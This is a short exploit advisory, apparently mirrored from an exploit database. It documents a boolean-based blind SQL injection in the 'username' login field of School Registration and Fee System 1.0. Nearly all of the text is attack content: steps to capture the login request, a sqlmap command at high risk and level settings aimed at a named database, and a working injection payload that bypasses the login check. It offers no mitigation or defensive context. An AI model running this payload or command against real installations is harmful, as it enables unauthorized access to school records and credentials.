Share
## https://sploitus.com/exploit?id=PACKETSTORM:162052
# Exploit Title: School Registration and Fee System | 'username ' Blind SQL Injection   
# Exploit Author: Richard Jones  
# Date: 01-04-2021  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/10932/school-registration-and-fee-system.html  
# Version: 1.0  
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34  
  
Step 1 - Capture login request  
Step 2 - Run Command: sqlmap -r sql.txt --batch --risk 3 --level 3 -D bilal  
  
parameter: username (POST)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)  
Payload: username=admin' OR NOT 7365=7365-- enST&password=asd